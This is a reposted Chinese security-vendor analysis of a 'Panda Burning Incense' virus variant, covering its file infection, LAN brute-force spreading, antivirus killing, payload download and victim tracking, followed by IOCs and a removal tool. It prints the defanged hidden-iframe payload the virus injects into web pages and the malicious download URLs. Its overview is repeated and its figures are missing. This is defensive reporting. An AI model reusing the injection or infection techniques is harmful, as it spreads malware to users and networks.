FavoriteLoading
0

高齡病毒“熊貓燒香”還沒退休?

事件描述

一、病毒概述

? ? 近日,深信服安全團隊收到客戶反饋,其內網多臺主機中的文件感染了病毒,影響正常業務。經分析,該病毒為“熊貓燒香”病毒變種,雖然該病毒已有十余年歷史,但由于其具有很強的感染及傳播性,依然很容易在缺少防護的企業內網中傳播開來。

? ? 病毒會對主機中的可執行文件、壓縮文件以及網頁文件進行感染,并可通過磁盤、局域網進行傳播,同時具有對抗殺軟的行為。

? ? 最早的“熊貓燒香”病毒中毒后被感染的可執行文件都會變成“熊貓燒香”的圖標,這也是該病毒名稱的來源。本次捕獲的變種由于其在感染可執行文件時會提取原文件的圖標并插入到被感染文件中,所以感染后圖標不會變。

病毒主要行為如下:

事件描述

一、病毒概述

? ? 近日,深信服安全團隊收到客戶反饋,其內網多臺主機中的文件感染了病毒,影響正常業務。經分析,該病毒為“熊貓燒香”病毒變種,雖然該病毒已有十余年歷史,但由于其具有很強的感染及傳播性,依然很容易在缺少防護的企業內網中傳播開來。

? ? 病毒會對主機中的可執行文件、壓縮文件以及網頁文件進行感染,并可通過磁盤、局域網進行傳播,同時具有對抗殺軟的行為。

? ? 最早的“熊貓燒香”病毒中毒后被感染的可執行文件都會變成“熊貓燒香”的圖標,這也是該病毒名稱的來源。本次捕獲的變種由于其在感染可執行文件時會提取原文件的圖標并插入到被感染文件中,所以感染后圖標不會變。

病毒主要行為如下:

二、詳細分析

2.1 植入部分

病毒運行后首先會將自身復制到%SystemRoot%\System32\drivers\suchost.exe:

病毒程序運行時,會判斷其所在目錄是否存在Desktop_.ini文件,如果存在的話就將其刪除:

排除感染NTDETECT.COM文件,然后通過文件后綴名確認感染目標,感染的文件類型主要分為三類:壓縮文件、可執行文件和網頁文件:RAR、ZIP、EXE、SCR、PIF、COM、htm、html、asp、php、jsp、aspx:

在感染文件前先獲取文件大小,超過某個值就不感染。壓縮文件為20M,可執行文件與網頁文件為10M:

對于RAR、ZIP后綴的壓縮文件,會執行winrar命令將其解壓縮到C:\MyRARwork文件夾,感染其中的文件后再壓縮回原目錄:

對于EXE、SCR、PIF、COM后綴的可執行文件,首先判斷其是否包含字符串“BMW!!”,是的話則不執行感染:

提取原文件的圖標,將其臨時保存到%Temp%目錄:

復制病毒文件覆蓋被感染文件:

將圖標文件除寫入病毒文件,使得被感染的文件圖標不變,隨后刪除圖標文件:

隨后將被感染的原文件添加到病毒文件后面,并在尾部寫入標志:

可執行文件被感染后的結構為:

病毒文件(替換了圖標)+原文件+0x00+”BMW!!”+原文件名+”.exe”+0x02+原文件大小+0x01

被感染的可執行文件尾部如下:

運行被感染的文件,會將原文件釋放出來,命名為“原文件名+.exe”:

在Temp目錄下創建bat腳本并運行, 在Temp目錄下創建bat腳本并運行,bat腳本用于刪除被感染的文件并將釋放的“原文件名+.exe”重命名為原文件名,內容如下:

對于htm、html、asp、php、jsp、aspx后綴的網頁文件的感染,是將惡意鏈接”<iframe src="hxxp://www.9z9t.com/htmmm/mm.htm" width=0 height=0></iframe>”\”解密后插入到文件末尾:

[3] 局域網傳播

對139、445端口進行暴破傳播:

2.3 惡意行為部分

停止或卸載殺毒軟件:

訪問如下網頁獲取惡意程序下載鏈接,下載惡意程序并運行:

添加開機自啟動項并禁止顯示隱藏文件:

關閉網絡共享:

將默認瀏覽器設置為IE,然后將本機mac作為參數訪問鏈接”hxxp://www.daohang08.com/down/tj/mac.asp?mac=”,用于統計中毒主機信息:

三、IOC

MD5:

AE8E8289B688497A672FE90D8A0AAE3F

URL:

hxxp://www.9z9t.com/htmmm/mm.htm

hxxp://www.9z9t.com/down1.txt

hxxp://www.daohang08.com/down/houmendown.txt

hxxp://www.daohang08.com/down/tj/mac.asp?mac=

解決方案

病毒檢測查殺

1、深信服為廣大用戶免費提供查殺工具,可下載如下工具,進行檢測查殺:

64位系統下載鏈接:

http://edr.sangfor.com.cn/tool/SfabAntiBot_X64.7z

32位系統下載鏈接:

http://edr.sangfor.com.cn/tool/SfabAntiBot_X86.7z

【聲明】:8090安全小組門戶(http://www.jvwkvg.tw)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。